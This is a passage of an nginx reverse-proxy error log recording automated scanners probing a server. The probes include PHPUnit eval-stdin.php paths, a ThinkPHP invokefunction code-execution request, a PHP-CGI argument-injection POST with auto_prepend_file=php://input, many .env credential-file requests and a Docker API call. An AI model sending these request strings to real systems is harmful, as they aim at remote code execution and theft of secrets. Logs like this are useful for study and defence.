"/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:34 [error] 401#401: *283556 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:35 [error] 401#401: *283556 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:35 [error] 401#401: *283556 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:36 [error] 401#401: *283556 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:37 [error] 401#401: *283556 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:37 [error] 401#401: *283556 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:38 [error] 401#401: *283556 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:38 [error] 401#401: *283556 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:39 [error] 401#401: *283556 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:40 [error] 401#401: *283556 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:40 [error] 401#401: *283556 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:41 [error] 401#401: *283556 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:41 [error] 401#401: *283556 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:42 [error] 401#401: *283556 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:43 [error] 401#401: *283556 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:43 [error] 401#401: *283556 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:44 [error] 401#401: *283556 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:44 [error] 401#401: *283556 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:45 [error] 401#401: *283556 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:45 [error] 401#401: *283556 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:46 [error] 401#401: *283556 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:47 [error] 401#401: *283556 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:42:49 [error] 401#401: *283556 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 217.154.69.208, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 12:43:33 [error] 401#401: *283557 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:36 [error] 401#401: *283558 open() "/var/www/html/aws/local.bak" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /aws/local.bak HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:36 [error] 401#401: *283559 open() "/var/www/html/prod/.env.dev" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /prod/.env.dev HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:36 [error] 401#401: *283560 open() "/var/www/html/test/.env.uat" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /test/.env.uat HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:36 [error] 401#401: *283561 open() "/var/www/html/tmp/.env.save" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /tmp/.env.save HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:36 [error] 401#401: *283562 open() "/var/www/html/nuxt/env.json" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /nuxt/env.json HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:37 [error] 402#402: *283563 open() "/var/www/html/nuxt/env.yaml" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /nuxt/env.yaml HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:37 [error] 402#402: *283564 open() "/var/www/html/temp/env/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /temp/env/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:37 [error] 402#402: *283565 open() "/var/www/html/old/.env.dist" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /old/.env.dist HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:37 [error] 402#402: *283566 open() "/var/www/html/test/.env.tmp" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /test/.env.tmp HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:37 [error] 402#402: *283567 open() "/var/www/html/opencart/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /opencart/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:37 [error] 402#402: *283568 open() "/var/www/html/test/.env.gcp" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /test/.env.gcp HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:37 [error] 402#402: *283569 open() "/var/www/html/tmp/.env.conf" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /tmp/.env.conf HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:38 [error] 402#402: *283570 open() "/var/www/html/tmp/.env.smtp" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /tmp/.env.smtp HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:38 [error] 402#402: *283571 open() "/var/www/html/web/.env.dist" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /web/.env.dist HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:38 [error] 402#402: *283572 open() "/var/www/html/partners/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /partners/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:39 [error] 400#400: *285060 open() "/var/www/html/test/.env.key" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /test/.env.key HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:39 [error] 400#400: *285061 open() "/var/www/html/resource/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /resource/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:39 [error] 400#400: *285062 open() "/var/www/html/panel/.env.db" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /panel/.env.db HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:40 [error] 400#400: *285063 open() "/var/www/html/qa/config.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /qa/config.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:41 [error] 401#401: *285064 open() "/var/www/html/wp-login/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /wp-login/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:41 [error] 401#401: *285065 open() "/var/www/html/prod/.env.bak" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /prod/.env.bak HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:41 [error] 401#401: *285066 open() "/var/www/html/upload/.env.2" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /upload/.env.2 HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:42 [error] 403#403: *286554 open() "/var/www/html/wp-config.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /wp-config.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:42 [error] 403#403: *286555 open() "/var/www/html/test/.env.dev" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /test/.env.dev HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:42 [error] 403#403: *286556 open() "/var/www/html/tmp/.env.test" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /tmp/.env.test HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:43 [error] 403#403: *286557 open() "/var/www/html/test/.env.php" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /test/.env.php HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:43 [error] 403#403: *286558 open() "/var/www/html/umgebung/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /umgebung/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 12:43:43 [error] 400#400: *286559 open() "/var/www/html/test/.env.pem" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /test/.env.pem HTTP/1.1", host: "91.82.83.208" +2026/01/18 13:03:23 [error] 400#400: *286579 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:06 [error] 400#400: *286585 open() "/var/www/html/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:06 [error] 400#400: *286585 open() "/var/www/html/xmlrpc.php" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /xmlrpc.php?rsd HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:07 [error] 400#400: *286585 open() "/var/www/html/blog/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:08 [error] 400#400: *286585 open() "/var/www/html/web/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:08 [error] 401#401: *286587 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:08 [error] 400#400: *286585 open() "/var/www/html/wordpress/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:09 [error] 400#400: *286585 open() "/var/www/html/website/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:09 [error] 400#400: *286585 open() "/var/www/html/wp/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:10 [error] 400#400: *286585 open() "/var/www/html/news/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:10 [error] 400#400: *286585 open() "/var/www/html/2020/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:10 [error] 400#400: *286585 open() "/var/www/html/2019/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:11 [error] 400#400: *286585 open() "/var/www/html/shop/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:11 [error] 400#400: *286585 open() "/var/www/html/wp1/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:12 [error] 400#400: *286585 open() "/var/www/html/test/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:12 [error] 400#400: *286585 open() "/var/www/html/wp2/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:13 [error] 400#400: *286585 open() "/var/www/html/site/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:13 [error] 400#400: *286585 open() "/var/www/html/cms/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:13 [error] 401#401: *286587 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:13 [error] 400#400: *286585 open() "/var/www/html/sito/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 34.186.83.175, server: localhost-nginx-proxy-manager, request: "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/18 13:07:14 [error] 401#401: *286587 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:18 [error] 401#401: *286587 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:21 [error] 401#401: *286587 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:24 [error] 401#401: *286587 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:25 [error] 401#401: *286587 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:25 [error] 401#401: *286587 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:27 [error] 401#401: *286587 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:27 [error] 401#401: *286587 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:35 [error] 401#401: *286587 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:07:36 [error] 401#401: *286587 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:07 [error] 401#401: *286587 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:08 [error] 401#401: *286587 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:10 [error] 401#401: *286587 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:10 [error] 401#401: *286587 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:14 [error] 401#401: *286587 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:16 [error] 401#401: *286587 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:17 [error] 401#401: *286587 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:17 [error] 401#401: *286587 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:20 [error] 401#401: *286587 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:21 [error] 401#401: *286587 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:21 [error] 401#401: *286587 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:21 [error] 401#401: *286587 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:22 [error] 401#401: *286587 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:23 [error] 401#401: *286587 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:23 [error] 401#401: *286587 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:24 [error] 401#401: *286587 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:26 [error] 401#401: *286587 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 13:08:27 [error] 401#401: *286587 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 154.92.16.80, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 